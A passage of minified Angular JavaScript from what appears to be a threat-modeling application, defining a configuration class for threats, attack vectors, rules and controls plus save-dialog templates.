Ln{constructor(a){if(super(a),this.assetGroups=[],this.myData=[],this.stencilTypeMap=new Map,this.stencilTypeTemplates=[],this.stencilThreatMnemonics=[],this.protocolMap=new Map,this.myComponentSWTypeMap=new Map,this.myComponentSWTypeGroups=[],this.myComponentPTypeMap=new Map,this.myComponentPTypeGroups=[],this.threatActors=[],this.threatCategoryGroups=[],this.threatCategoryMap=new Map,this.attackVectorGroups=[],this.attackVectorMap=new Map,this.threatQuestionMap=new Map,this.threatRuleGroups=[],this.threatRuleMap=new Map,this.controlGroups=[],this.controlMap=new Map,this.requirementTypes=[],this.checklistTypes=[],this.FileChanged=!1,this.Data.Name||(this.Data.Name="New Configuration"),this.Data.Version||(this.Data.Version=D5.ConfigVersion),!this.Data.threatLibraryID){let e=this.CreateAttackVectorGroup(null);e.Name="Threat Library",this.Data.threatLibraryID=e.ID}if(!this.Data.DFDthreatRuleGroupsID){let e=this.CreateThreatRuleGroup(null);e.Name="CPDFD Rules",e.RuleType=on.DFD,this.Data.DFDthreatRuleGroupsID=e.ID}if(!this.Data.stencilThreatRuleGroupsID){let e=this.CreateThreatRuleGroup(null);e.Name="Stencil Rules",e.RuleType=on.Stencil,this.Data.stencilThreatRuleGroupsID=e.ID}if(!this.Data.componentThreatRuleGroupsID){let e=this.CreateThreatRuleGroup(null);e.Name="Component Rules",e.RuleType=on.Component,this.Data.componentThreatRuleGroupsID=e.ID}if(!this.Data.assetGroupID){let e=this.CreateAssetGroup(null);e.Name="Asset Groups",this.Data.assetGroupID=e.ID}if(!this.Data.controlLibraryID){let e=this.CreateControlGroup(null);e.Name="Controls",this.Data.controlLibraryID=e.ID}}get Version(){return this.Data.Version}get AssetGroups(){return this.GetAssetGroup(this.Data.assetGroupID)}get ThreatLibrary(){return this.GetAttackVectorGroup(this.Data.threatLibraryID)}get DFDThreatRuleGroups(){return this.GetThreatRuleGroup(this.Data.DFDthreatRuleGroupsID)}get StencilThreatRuleGroups(){return this.GetThreatRuleGroup(this.Data.stencilThreatRuleGroupsID)}get ComponentThreatRuleGroups(){return this.GetThreatRuleGroup(this.Data.componentThreatRuleGroupsID)}get ControlLibrary(){return this.GetControlGroup(this.Data.controlLibraryID)}GetAssetGroups(){return this.assetGroups}GetMyDatas(){return this.myData}GetStencilTypes(){return Array.from(this.stencilTypeMap,([a,e])=>e)}GetStencilTypeTemplates(){return this.stencilTypeTemplates}GetStencilThreatMnemonics(){return this.stencilThreatMnemonics}GetProtocols(){return Array.from(this.protocolMap,([a,e])=>e)}GetMyComponentTypes(a){return a==zr.Software?this.GetMyComponentSWTypes():this.GetMyComponentPTypes()}GetMyComponentSWTypes(){return Array.from(this.myComponentSWTypeMap,([a,e])=>e)}GetMyComponentSWTypeGroups(){return this.myComponentSWTypeGroups}GetMyComponentTypeGroups(a){return a==zr.Software?this.myComponentSWTypeGroups:this.myComponentPTypeGroups}GetMyComponentPTypes(){return Array.from(this.myComponentPTypeMap,([a,e])=>e)}GetMyComponentPTypeGroups(){return this.myComponentPTypeGroups}GetThreatActors(){return this.threatActors}GetThreatCategoryGroups(){return this.threatCategoryGroups}GetThreatCategories(){return Array.from(this.threatCategoryMap,([a,e])=>e)}GetAttackVectorGroups(){return this.attackVectorGroups}GetAttackVectors(){return Array.from(this.attackVectorMap,([a,e])=>e)}GetThreatQuestions(){return Array.from(this.threatQuestionMap,([a,e])=>e)}GetThreatRuleGroups(){return this.threatRuleGroups}GetThreatRules(){return Array.from(this.threatRuleMap,([a,e])=>e)}GetControlGroups(){return this.controlGroups}GetControls(){return Array.from(this.controlMap,([a,e])=>e)}GetRequirementTypes(){return this.requirementTypes}GetChecklistTypes(){return this.checklistTypes}GetAssetGroup(a){return this.assetGroups.find(e=>e.ID==a)}CreateAssetGroup(a){let e=new Zl({},null,this);return this.assetGroups.push(e),e.Name=Gi.FindUniqueName("Asset Group",this.assetGroups.map(i=>i.Name)),null!=a&&a.AddAssetGroup(e),e}DeleteAssetGroup(a){const e=this.assetGroups.indexOf(a);return e>=0&&(a.OnDelete(this.ProjectFile,this),this.assetGroups.splice(e,1)),e>=0}GetMyData(a){return this.myData.find(e=>e.ID==a)}CreateMyData(a){let e=new Pu({},null,this);return a&&a.AddMyData(e),this.myData.push(e),e.Name=Gi.FindUniqueName("Data",this.GetMyDatas().map(i=>i.Name)),e}DeleteMyData(a){const e=this.myData.indexOf(a);return e>=0&&(a.OnDelete(this.ProjectFile,this),this.myData.splice(e,1)),e>=0}GetStencilType(a){return this.stencilTypeMap.get(a)}CreateStencilType(a){let e=new oM({},this);return e.ElementTypeID=a,e.Name=Sc.Constructor(a).GetDefaultType(this).Name,this.stencilTypeMap.set(e.ID,e),e.Name=Gi.FindUniqueName(e.Name,this.GetStencilTypes().map(i=>i.Name)),e}DeleteStencilType(a){return!!this.stencilTypeMap.has(a.ID)&&(a.OnDelete(this.ProjectFile,this),this.stencilTypeMap.delete(a.ID),!0)}GetStencilElementType(a){return a?this.GetStencilTypes().find(e=>e.IsDefault&&e.ElementTypeID==a.ElementTypeID):null}GetAllStencilProperties(a){if(!a)return null;let e=[];return a.Properties&&e.push(...a.Properties),!a.IsDefault&&this.GetStencilElementType(a).Properties&&e.push(...this.GetStencilElementType(a).Properties),a.ElementTypeID==Et.DataFlow&&e.push(...Lu.GetDefaultType(this).Properties),e}MoveItemInStencilTypes(a,e){this.moveItemInMap("stencilTypeMap",a,e)}GetStencilTypeTemplate(a){return this.stencilTypeTemplates.find(e=>e.ID==a)}CreateStencilTypeTemplate(){let a=new rM({},this);return this.stencilTypeTemplates.push(a),a.Name=Gi.FindUniqueName("Template",this.GetStencilTypeTemplates().map(e=>e.Name)),a}DeleteStencilTypeTemplate(a){const e=this.stencilTypeTemplates.indexOf(a);return e>=0&&(a.OnDelete(this.ProjectFile,this),this.stencilTypeTemplates.splice(e,1)),e>=0}GetStencilThreatMnemonic(a){return this.stencilThreatMnemonics.find(e=>e.ID==a)}CreateStencilThreatMnemonic(){let a=new sM({},this);return this.stencilThreatMnemonics.push(a),a.Name=Gi.FindUniqueName("Mnemonic",this.GetStencilThreatMnemonics().map(e=>e.Name)),a}DeleteStencilThreatMnemonic(a){const e=this.stencilThreatMnemonics.indexOf(a);return e>=0&&(a.OnDelete(this.ProjectFile,this),this.stencilThreatMnemonics.splice(e,1)),e>=0}GetProtocol(a){return this.protocolMap.get(a)}CreateProtocol(){let a=new Lu({},this);return this.protocolMap.set(a.ID,a),a.Name=Gi.FindUniqueName("Protocol",this.GetProtocols().map(e=>e.Name)),a}DeleteProtocol(a){return!!this.protocolMap.has(a.ID)&&(a.OnDelete(this.ProjectFile,this),this.protocolMap.delete(a.ID),!0)}MoveItemInProtocols(a,e){this.moveItemInMap("protocolMap",a,e)}GetMyComponentTypeGroup(a){let e=this.myComponentSWTypeGroups.find(i=>i.ID==a);return e||(e=this.myComponentPTypeGroups.find(i=>i.ID==a)),e}CreateMyComponentTypeGroup(a){let e=new Xb({},this);e.ComponentTypeID=a;let i=a==zr.Software?this.myComponentSWTypeGroups:this.myComponentPTypeGroups;return e.Name=Gi.FindUniqueName("Component Type Group",i.map(n=>n.Name)),i.push(e),e}DeleteMyComponentTypeGroup(a){let e=a.ComponentTypeID==zr.Software?this.myComponentSWTypeGroups:this.myComponentPTypeGroups;const i=e.indexOf(a);return i>=0&&(a.OnDelete(this.ProjectFile,this),e.splice(i,1)),i>=0}GetMyComponentType(a){return this.myComponentSWTypeMap.has(a)?this.myComponentSWTypeMap.get(a):this.myComponentPTypeMap.has(a)?this.myComponentPTypeMap.get(a):void 0}CreateMyComponentType(a){let e=new Kb({},this);return a.AddMyComponentType(e),e.ComponentTypeID=a.ComponentTypeID,a.ComponentTypeID==zr.Software?this.myComponentSWTypeMap.set(e.ID,e):this.myComponentPTypeMap.set(e.ID,e),e.Name=Gi.FindUniqueName("Component Type",this.GetMyComponentTypes(a.ComponentTypeID).map(i=>i.Name)),e}DeleteMyComponentType(a){let e=a.ComponentTypeID==zr.Software?this.myComponentSWTypeMap:this.myComponentPTypeMap;return!!e.has(a.ID)&&(a.OnDelete(this.ProjectFile,this),e.delete(a.ID),!0)}FindGroupOfMyComponent(a){return a.ComponentTypeID==zr.Software?this.myComponentSWTypeGroups.find(e=>e.Types.some(i=>i.ID==a.ID)):this.myComponentPTypeGroups.find(e=>e.Types.some(i=>i.ID==a.ID))}GetThreatActor(a){return this.threatActors.find(e=>e.ID==a)}CreateThreatActor(){let a=new Gp({},null,this);return a.Name=Gi.FindUniqueName("Threat Actor",this.threatActors.map(e=>e.Name)),a.Likelihood=dr.Medium,this.threatActors.push(a),a}DeleteThreatActor(a){const e=this.threatActors.indexOf(a);return e>=0&&this.threatActors.splice(e,1),e>=0}GetThreatCategory(a){return this.threatCategoryMap.get(a)}CreateThreatCategory(){let a=new Jb({},this);return this.threatCategoryMap.set(a.ID,a),a.Name=Gi.FindUniqueName("Threat Category",this.GetThreatCategories().map(e=>e.Name)),a}DeleteThreatCategory(a){return!!this.threatCategoryMap.has(a.ID)&&(a.OnDelete(this.ProjectFile,this),this.stencilTypeMap.delete(a.ID),!0)}FindGroupOfThreatCategory(a){return this.threatCategoryGroups.find(e=>e.ThreatCategories.some(i=>i.ID==a.ID))}GetThreatCategoryGroup(a){return this.threatCategoryGroups.find(e=>e.ID==a)}CreateThreatCategoryGroup(){let a=new Zb({},this);return this.threatCategoryGroups.push(a),a.Name=Gi.FindUniqueName("Group",this.GetThreatCategoryGroups().map(e=>e.Name)),a}DeleteThreatCategoryGroup(a){const e=this.threatCategoryGroups.indexOf(a);return e>=0&&(a.OnDelete(this.ProjectFile,this),this.threatCategoryGroups.splice(e,1)),e>=0}GetAttackVectorGroup(a){return this.attackVectorGroups.find(e=>e.ID==a)}CreateAttackVectorGroup(a){let e=new tM({},this);return this.attackVectorGroups.push(e),e.Name=Gi.FindUniqueName("Attack Vector Group",this.attackVectorGroups.map(i=>i.Name)),null!=a&&a.AddAttackVectorGroup(e),e}DeleteAttackVectorGroup(a){const e=this.attackVectorGroups.indexOf(a);return e>=0&&(a.OnDelete(this.ProjectFile,this),this.attackVectorGroups.splice(e,1)),e>=0}FindGroupOfAttackVectorGroup(a){return this.attackVectorGroups.find(e=>e.SubGroups.some(i=>i.ID==a.ID))}GetAttackVector(a){return this.attackVectorMap.get(a)}CreateAttackVector(a){let e=new zp({},this);return a&&a.AddAttackVector(e),this.attackVectorMap.set(e.ID,e),e.Name=Gi.FindUniqueName("Attack Vector",this.GetAttackVectors().map(i=>i.Name)),e}DeleteAttackVector(a){return!!this.attackVectorMap.has(a.ID)&&(a.OnDelete(this.ProjectFile,this),this.attackVectorMap.delete(a.ID),!0)}FindGroupOfAttackVector(a){return this.attackVectorGroups.find(e=>e.AttackVectors.some(i=>i.ID==a.ID))}GetThreatQuestion(a){return this.threatQuestionMap.get(a)}CreateThreatQuestion(){let a=new iM({},this);return this.threatQuestionMap.set(a.ID,a),a.Name=Gi.FindUniqueName("Question",this.GetThreatQuestions().map(e=>e.Name)),a}DeleteThreatQuestion(a){return!!this.threatQuestionMap.has(a.ID)&&(a.OnDelete(this.ProjectFile,this),this.threatQuestionMap.delete(a.ID),!0)}MoveItemInThreatQuestions(a,e){this.moveItemInMap("threatQuestionMap",a,e)}GetThreatRuleGroup(a){return this.threatRuleGroups.find(e=>e.ID==a)}CreateThreatRuleGroup(a){let e=new aM({},this);return this.threatRuleGroups.push(e),e.Name=Gi.FindUniqueName("Threat Rule Group",this.threatRuleGroups.map(i=>i.Name)),null!=a&&a.AddThreatRuleGroup(e),e}DeleteThreatRuleGroup(a){const e=this.threatRuleGroups.indexOf(a);return e>=0&&(a.OnDelete(this.ProjectFile,this),this.threatRuleGroups.splice(e,1)),e>=0}FindGroupOfThreatRuleGroup(a){return this.threatRuleGroups.find(e=>e.SubGroups.some(i=>i.ID==a.ID))}GetThreatRule(a){return this.threatRuleMap.get(a)}CreateThreatRule(a,e){let i=new Fp({},this);return i.RuleType=e,a&&a.AddThreatRule(i),this.threatRuleMap.set(i.ID,i),i.Name=Gi.FindUniqueName("Threat Rule",this.GetThreatRules().map(n=>n.Name)),i}DeleteThreatRule(a){return!!this.threatRuleMap.has(a.ID)&&(a.OnDelete(this.ProjectFile,this),this.threatRuleMap.delete(a.ID),!0)}FindGroupOfThreatRule(a){return this.threatRuleGroups.find(e=>e.ThreatRules.some(i=>i.ID==a.ID))}MoveItemInThreatRules(a,e){this.moveItemInMap("threatRuleMap",a,e)}GetControl(a){return this.controlMap.get(a)}CreateControl(a){let e=new Wg({},this);return a&&a.AddControl(e),this.controlMap.set(e.ID,e),e.Name=Gi.FindUniqueName("Control",this.GetControls().map(i=>i.Name)),e}DeleteControl(a){return!!this.controlMap.has(a.ID)&&(a.OnDelete(this.ProjectFile,this),this.controlMap.delete(a.ID),!0)}FindGroupOfControl(a){return this.controlGroups.find(e=>e.Controls.some(i=>i.ID==a.ID))}GetControlGroup(a){return this.controlGroups.find(e=>e.ID==a)}CreateControlGroup(a){let e=new Yb({},this);return this.controlGroups.push(e),e.Name=Gi.FindUniqueName("Control Group",this.controlGroups.map(i=>i.Name)),null!=a&&a.AddControlGroup(e),e}DeleteControlGroup(a){const e=this.controlGroups.indexOf(a);return e>=0&&(a.OnDelete(this.ProjectFile,this),this.controlGroups.splice(e,1)),e>=0}FindGroupOfControlGroup(a){return this.ControlLibrary.SubGroups.includes(a)?this.ControlLibrary:this.controlGroups.find(e=>e.SubGroups.some(i=>i.ID==a.ID))}GetRequirementType(a){return this.requirementTypes.find(e=>e.ID==a)}CreateRequirementType(){let a=new Yg({},this);return this.requirementTypes.push(a),a.Name=Gi.FindUniqueName("Requirement",this.GetRequirementTypes().map(e=>e.Name)),a}DeleteRequirementType(a){const e=this.requirementTypes.indexOf(a);return e>=0&&(a.OnDelete(this.ProjectFile,this),this.requirementTypes.splice(e,1)),e>=0}GetChecklistType(a){return this.checklistTypes.find(e=>e.ID==a)}CreateChecklistType(){let a=new Jg({},this);return this.checklistTypes.push(a),a.Name=Gi.FindUniqueName("Checklist",this.GetChecklistTypes().map(e=>e.Name)),a}DeleteChecklistType(a){const e=this.checklistTypes.indexOf(a);return e>=0&&(a.OnDelete(this.ProjectFile,this),this.checklistTypes.splice(e,1)),e>=0}moveItemInMap(a,e,i){let r=Array.from(this[a].entries());r.splice(i,0,r.splice(e,1)[0]),this[a]=new Map(r)}FindReferences(a,e){return null}OnDelete(a,e){}ToJSON(){let a={Data:this.Data,assetGroups:[],myData:[],stencilTypes:[],stencilTypeTemplates:[],stencilThreatMnemonics:[],protocols:[],myComponentSWTypes:[],myComponentSWTypeGroups:[],myComponentPTypes:[],myComponentPTypeGroups:[],threatActors:[],threatCategoryGroups:[],threatCategories:[],attackVectorGroups:[],attackVectors:[],threatQuestions:[],threatRuleGroups:[],threatRules:[],controls:[],controlGroups:[],requirementTypes:[],checklistTypes:[]};return this.assetGroups.forEach(e=>a.assetGroups.push(e.ToJSON())),this.myData.forEach(e=>a.myData.push(e.ToJSON())),this.stencilTypeMap.forEach(e=>a.stencilTypes.push(e.ToJSON())),this.stencilTypeTemplates.forEach(e=>a.stencilTypeTemplates.push(e.ToJSON())),this.stencilThreatMnemonics.forEach(e=>a.stencilThreatMnemonics.push(e.ToJSON())),this.protocolMap.forEach(e=>a.protocols.push(e.ToJSON())),this.myComponentSWTypeMap.forEach(e=>a.myComponentSWTypes.push(e.ToJSON())),this.myComponentSWTypeGroups.forEach(e=>a.myComponentSWTypeGroups.push(e.ToJSON())),this.myComponentPTypeMap.forEach(e=>a.myComponentPTypes.push(e.ToJSON())),this.myComponentPTypeGroups.forEach(e=>a.myComponentPTypeGroups.push(e.ToJSON())),this.threatActors.forEach(e=>a.threatActors.push(e.ToJSON())),this.threatCategoryGroups.forEach(e=>a.threatCategoryGroups.push(e.ToJSON())),this.threatCategoryMap.forEach(e=>a.threatCategories.push(e.ToJSON())),this.attackVectorGroups.forEach(e=>a.attackVectorGroups.push(e.ToJSON())),this.attackVectorMap.forEach(e=>a.attackVectors.push(e.ToJSON())),this.threatQuestionMap.forEach(e=>a.threatQuestions.push(e.ToJSON())),this.threatRuleGroups.forEach(e=>a.threatRuleGroups.push(e.ToJSON())),this.threatRuleMap.forEach(e=>a.threatRules.push(e.ToJSON())),this.controlGroups.forEach(e=>a.controlGroups.push(e.ToJSON())),this.controlMap.forEach(e=>a.controls.push(e.ToJSON())),this.requirementTypes.forEach(e=>a.requirementTypes.push(e.ToJSON())),this.checklistTypes.forEach(e=>a.checklistTypes.push(e.ToJSON())),a}static FromJSON(a){var e,i,n,r,c,d;const T=new Wu(a.Data);return a.assetGroups.forEach(k=>T.assetGroups.push(Zl.FromJSON(k,null,T))),a.myData.forEach(k=>T.myData.push(Pu.FromJSON(k,null,T))),a.stencilTypes.forEach(k=>T.stencilTypeMap.set(k.ID,oM.FromJSON(k,T))),a.stencilTypeTemplates.forEach(k=>T.stencilTypeTemplates.push(rM.FromJSON(k,T))),null===(e=a.stencilThreatMnemonics)||void 0===e||e.forEach(k=>T.stencilThreatMnemonics.push(sM.FromJSON(k,T))),a.protocols.forEach(k=>T.protocolMap.set(k.ID,Lu.FromJSON(k,T))),a.myComponentSWTypes.forEach(k=>T.myComponentSWTypeMap.set(k.ID,Kb.FromJSON(k,T))),a.myComponentSWTypeGroups.forEach(k=>T.myComponentSWTypeGroups.push(Xb.FromJSON(k,T))),a.myComponentPTypes.forEach(k=>T.myComponentPTypeMap.set(k.ID,Kb.FromJSON(k,T))),a.myComponentPTypeGroups.forEach(k=>T.myComponentPTypeGroups.push(Xb.FromJSON(k,T))),null===(i=a.threatActors)||void 0===i||i.forEach(k=>T.threatActors.push(Gp.FromJSON(k,null,T))),a.threatCategories.forEach(k=>T.threatCategoryMap.set(k.ID,Jb.FromJSON(k,T))),a.threatCategoryGroups.forEach(k=>T.threatCategoryGroups.push(Zb.FromJSON(k,T))),a.attackVectorGroups.forEach(k=>T.attackVectorGroups.push(tM.FromJSON(k,T))),a.attackVectors.forEach(k=>T.attackVectorMap.set(k.ID,zp.FromJSON(k,T))),a.threatQuestions.forEach(k=>T.threatQuestionMap.set(k.ID,iM.FromJSON(k,T))),a.threatRuleGroups.forEach(k=>T.threatRuleGroups.push(aM.FromJSON(k,T))),a.threatRules.forEach(k=>T.threatRuleMap.set(k.ID,Fp.FromJSON(k,T))),null===(n=a.controlGroups)||void 0===n||n.forEach(k=>T.controlGroups.push(Yb.FromJSON(k,T))),null===(r=a.controls)||void 0===r||r.forEach(k=>T.controlMap.set(k.ID,Wg.FromJSON(k,T))),null===(c=a.requirementTypes)||void 0===c||c.forEach(k=>T.requirementTypes.push(Yg.FromJSON(k,T))),null===(d=a.checklistTypes)||void 0===d||d.forEach(k=>T.checklistTypes.push(Jg.FromJSON(k,T))),T.FileChanged=!1,T}static DefaultFile(){return Wu.FromJSON(JSON.parse(JSON.stringify(_we)))}}function ZPe(t,a){if(1&t&&(m(0,"mat-option",15),s(1),u()),2&t){const e=a.$implicit;F("value",e.id),g(1),ke(e.name)}}function eOe(t,a){1&t&&(m(0,"mat-error"),s(1,"\n Name is "),m(2,"strong"),s(3,"required"),u(),s(4,"\n "),u())}function tOe(t,a){1&t&&(m(0,"mat-error"),s(1,"\n A project "),m(2,"strong"),s(3,"already exists"),u(),s(4," with this name\n "),u())}function iOe(t,a){if(1&t&&(m(0,"mat-option",15),s(1),u()),2&t){const e=a.$implicit;F("value",e.Key),g(1),ke(e.Value)}}function aOe(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n "),m(2,"mat-form-field",3),s(3,"\n "),m(4,"mat-label"),s(5,"Repository"),u(),s(6,"\n "),m(7,"mat-select",11),he("valueChange",function(n){return be(e),Me(V().data.newProject.repoId=n)}),s(8,"\n "),ne(9,ZPe,2,2,"mat-option",12),s(10,"\n "),u(),s(11,"\n "),u(),s(12,"\n "),m(13,"mat-form-field"),s(14,"\n "),m(15,"mat-label"),s(16),oe(17,"translate"),u(),s(18,"\n "),it(19,"input",13),s(20,"\n "),m(21,"span",14),s(22,".ttmp"),u(),s(23,"\n "),ne(24,eOe,5,0,"mat-error",2),s(25,"\n "),ne(26,tOe,5,0,"mat-error",2),s(27,"\n "),u(),s(28,"\n "),m(29,"mat-form-field",3),s(30,"\n "),m(31,"mat-label"),s(32,"Configuration"),u(),s(33,"\n "),m(34,"mat-select",11),he("valueChange",function(n){return be(e),Me(V().data.newProject.configFile=n)}),s(35,"\n "),ne(36,iOe,2,2,"mat-option",12),s(37,"\n "),u(),s(38,"\n "),u(),s(39,"\n "),Mt()}if(2&t){const e=V();g(7),F("value",e.data.newProject.repoId),g(2),F("ngForOf",e.Repos),g(7),ke(re(17,9,"general.Name")),g(3),F("formControl",e.nameFormControl)("errorStateMatcher",e.matcher),g(5),F("ngIf",e.nameFormControl.hasError("required")),g(2),F("ngIf",e.nameFormControl.hasError("forbiddenName")),g(8),F("value",e.data.newProject.configFile),g(2),F("ngForOf",e.Configs)}}function nOe(t,a){if(1&t&&(m(0,"mat-option",15),s(1),u()),2&t){const e=a.$implicit;F("value",e.id),g(1),ke(e.name)}}function oOe(t,a){1&t&&(m(0,"mat-error"),s(1,"\n Name is "),m(2,"strong"),s(3,"required"),u(),s(4,"\n "),u())}function rOe(t,a){1&t&&(m(0,"mat-error"),s(1,"\n A configuration "),m(2,"strong"),s(3,"already exists"),u(),s(4," with this name\n "),u())}function sOe(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n "),m(2,"mat-form-field",3),s(3,"\n "),m(4,"mat-label"),s(5,"Repository"),u(),s(6,"\n "),m(7,"mat-select",11),he("valueChange",function(n){return be(e),Me(V().data.newConfig.repoId=n)}),s(8,"\n "),ne(9,nOe,2,2,"mat-option",12),s(10,"\n "),u(),s(11,"\n "),u(),s(12,"\n "),m(13,"mat-form-field"),s(14,"\n "),m(15,"mat-label"),s(16),oe(17,"translate"),u(),s(18,"\n "),it(19,"input",16),s(20,"\n "),m(21,"span",14),s(22,".ttmc"),u(),s(23,"\n "),ne(24,oOe,5,0,"mat-error",2),s(25,"\n "),ne(26,rOe,5,0,"mat-error",2),s(27,"\n "),u(),s(28,"\n "),Mt()}if(2&t){const e=V();g(7),F("value",e.data.newConfig.repoId),g(2),F("ngForOf",e.Repos),g(7),ke(re(17,8,"general.Name")),g(3),F("spellcheck",e.dataService.HasSpellCheck)("formControl",e.nameFormControl)("errorStateMatcher",e.matcher),g(5),F("ngIf",e.nameFormControl.hasError("required")),g(2),F("ngIf",e.nameFormControl.hasError("forbiddenName"))}}function cOe(t,a){if(1&t){const e=Ye();m(0,"mat-checkbox",17),he("ngModelChange",function(n){return be(e),Me(V().data.removePW=n)}),s(1),oe(2,"translate"),u()}2&t&&(F("ngModel",V().data.removePW),g(1),ke(re(2,2,"dialog.save.removePW")))}function lOe(t,a){if(1&t){const e=Ye();m(0,"mat-form-field",3),s(1,"\n "),m(2,"mat-label"),s(3),oe(4,"translate"),u(),s(5,"\n "),m(6,"input",18),he("ngModelChange",function(n){return be(e),Me(V().data.pw=n)})("keydown.enter",function(){return be(e),Me(V().dialogRef.close(!0))}),u(),s(7,"\n "),m(8,"mat-icon",19),he("click",function(){be(e);const n=V();return Me(n.show=!n.show)}),s(9),u(),s(10,"\n "),m(11,"mat-icon",20),oe(12,"translate"),s(13,"privacy_tip"),u(),s(14,"\n "),u()}if(2&t){const e=V();g(3),ke(re(4,5,"dialog.save.addPW")),g(3),F("type",e.show?"text":"password")("ngModel",e.data.pw),g(3),ke(e.show?"visibility_off":"visibility"),g(2),at("matTooltip",re(12,7,"dialog.save.security"))}}function dOe(t,a){if(1&t){const e=Ye();m(0,"button",21),he("click",function(){return be(e),Me(V().onSave())}),s(1),oe(2,"translate"),u()}2&t&&(F("disabled",!V().canSave)("mat-dialog-close",!0),g(1),ke(re(2,3,"general.Save")))}function mOe(t,a){if(1&t){const e=Ye();m(0,"button",22),he("click",function(){return be(e),Me(V().onSave())}),s(1),oe(2,"translate"),u()}2&t&&(F("disabled",!V().canSave)("mat-dialog-close",!0),g(1),ke(re(2,3,"general.Save")))}class uOe{isErrorState(a,e){return!!(a&&a.invalid&&(a.dirty||a.touched||e&&e.submitted))}}function hOe(t){return a=>{let e=t.includes(a.value+".ttmp");return e||(e=t.includes(a.value+".ttmc")),e?{forbiddenName:{value:a.value}}:null}}let GG=(()=>{class t{constructor(e,i,n){this.dialogRef=e,this.data=i,this.dataService=n,this.nameFormControl=new lu("",[Td.required,hOe([...this.dataService.AvailableGHProjects.map(r=>r.name),...this.dataService.AvailableGHConfigs.map(r=>r.name)])]),this.matcher=new uOe,this.show=!1}get canSave(){return!("newProject"in this.data&&(null==this.data.newProject.repoId||this.nameFormControl.hasError("required")||this.nameFormControl.hasError("forbiddenName"))||"newConfig"in this.data&&(null==this.data.newConfig.repoId||this.nameFormControl.hasError("required")||this.nameFormControl.hasError("forbiddenName")))}get Configs(){return this.configs||(this.configs=[{Key:null,Value:"Default Configuration"}],this.dataService.AvailableGHConfigs.forEach(e=>{this.configs.push({Key:e,Value:e.name})})),this.configs}get Repos(){return this.dataService.Repos.filter(e=>e.isWritable)}ngOnInit(){}onSave(){"newProject"in this.data?(this.data.newProject.name=this.nameFormControl.value+".ttmp",this.data.newProject.path="projects/"+this.nameFormControl.value+".ttmp"):"newConfig"in this.data&&(this.data.newConfig.name=this.nameFormControl.value+".ttmc",this.data.newConfig.path="configs/"+this.nameFormControl.value+".ttmc")}}return t.\u0275fac=function(e){return new(e||t)(Ee(Gh),Ee(_p),Ee(Yi))},t.\u0275cmp=Wt({type:t,selectors:[["app-save-dialog"]],decls:37,vars:17,consts:[["mat-dialog-title",""],["mat-dialog-content","",2,"display","grid"],[4,"ngIf"],[1,"field-width"],["matInput","","type","text","placeholder","Update",1,"field-width",3,"spellcheck","ngModel","ngModelChange","keydown.enter"],["color","primary","style","padding-bottom: 10px;",3,"ngModel","ngModelChange",4,"ngIf"],["class","field-width",4,"ngIf"],["mat-dialog-actions","",2,"float","right"],["mat-button","","mat-dialog-close",""],["mat-button","",3,"disabled","mat-dialog-close","click",4,"ngIf"],["mat-button","","cdkFocusInitial","",3,"disabled","mat-dialog-close","click",4,"ngIf"],[3,"value","valueChange"],[3,"value",4,"ngFor","ngForOf"],["matInput","",3,"formControl","errorStateMatcher"],["matSuffix",""],[3,"value"],["matInput","",3,"spellcheck","formControl","errorStateMatcher"],["color","primary",2,"padding-bottom","10px",3,"ngModel","ngModelChange"],["matInput","",1,"field-width",3,"type","ngModel","ngModelChange","keydown.enter"],["matSuffix","",3,"click"],["matSuffix","",3,"matTooltip"],["mat-button","",3,"disabled","mat-dialog-close","click"],["mat-button","","cdkFocusInitial","",3,"disabled","mat-dialog-close","click"]],template:function(e,i){1&e&&(m(0,"h1",0),s(1),oe(2,"translate"),u(),s(3,"\n"),m(4,"div",1),s(5,"\n "),ne(6,aOe,40,11,"ng-container",2),s(7,"\n\n "),ne(8,sOe,29,10,"ng-container",2),s(9,"\n\n "),m(10,"mat-form-field",3),s(11,"\n "),m(12,"mat-label"),s(13),oe(14,"translate"),u(),s(15,"\n "),m(16,"input",4),he("ngModelChange",function(r){return i.data.msg=r})("keydown.enter",function(){return i.dialogRef.close(!0)}),u(),s(17,"\n "),u(),s(18,"\n "),it(19,"br"),s(20,"\n "),ne(21,cOe,3,4,"mat-checkbox",5),s(22,"\n "),ne(23,lOe,15,9,"mat-form-field",6),s(24,"\n"),u(),s(25,"\n"),m(26,"div",7),s(27,"\n "),m(28,"button",8),s(29),oe(30,"translate"),u(),s(31,"\n "),ne(32,dOe,3,5,"button",9),s(33,"\n "),ne(34,mOe,3,5,"button",10),s(35,"\n"),u(),s(36,"\n")),2&e&&(g(1),ke(re(2,11,"general.Save")),g(5),F("ngIf",i.data.newProject),g(2),F("ngIf",i.data.newConfig),g(5),ke(re(14,13,"dialog.save.CommitMsg")),g(3),F("spellcheck",i.dataService.HasSpellCheck)("ngModel",i.data.msg),g(5),F("ngIf",null!=i.data.removePW),g(2),F("ngIf",null==i.data.removePW),g(6),ke(re(30,15,"general.Cancel")),g(3),F("ngIf",i.data.newProject||i.data.newConfig),g(2),F("ngIf",!i.data.newProject&&!i.data.newConfig))},dependencies:[Zi,Ri,an,Ta,Ea,N4,oa,br,da,Age,nn,un,jr,Nr,yr,Xa,Pa,vm,Am,Tm,Em,Xi],styles:[".field-width[_ngcontent-%COMP%]{width:355px}"]}),t})();var yM=de(2344);function fOe(t,a){if(1&t&&(m(0,"mat-icon",14),s(1),u()),2&t){const e=V();g(1),ke(e.GetIcon(e.SelectedProject))}}function pOe(t,a){if(1&t&&(m(0,"mat-option",15),s(1,"\n "),m(2,"mat-icon"),s(3),u(),s(4),u()),2&t){const e=a.$implicit,i=V();at("matTooltip",e.tooltip),F("value",e),g(3),ke(i.GetIcon(e)),g(1),ct("\n ",e.name,"\n ")}}function _Oe(t,a){if(1&t){const e=Ye();m(0,"li"),s(1,"\n "),m(2,"mat-checkbox",16),he("ngModelChange",function(n){return Me(be(e).$implicit.Key=n)})("ngModelChange",function(){return be(e),Me(V().UpdateAllDetails())}),s(3),oe(4,"translate"),u(),s(5,"\n "),u()}if(2&t){const e=a.$implicit,i=V();g(2),F("disabled",!i.SourceProject||null==e.Key)("ngModel",e.Key),g(1),ct("\n ",re(4,3,e.Value),"\n ")}}let gOe=(()=>{class t{constructor(e,i,n){this.dataService=e,this.messageService=i,this.translate=n,this.AvailableProjects=[],this.Details=[],this.AllDetails=!1,this.TransferLog=null}get SourceProject(){return this.sourceProject}set SourceProject(e){this.sourceProject=e,e&&(this.TransferLog=null)}ngOnInit(){this.dataService.AvailableProjects.forEach(e=>{var 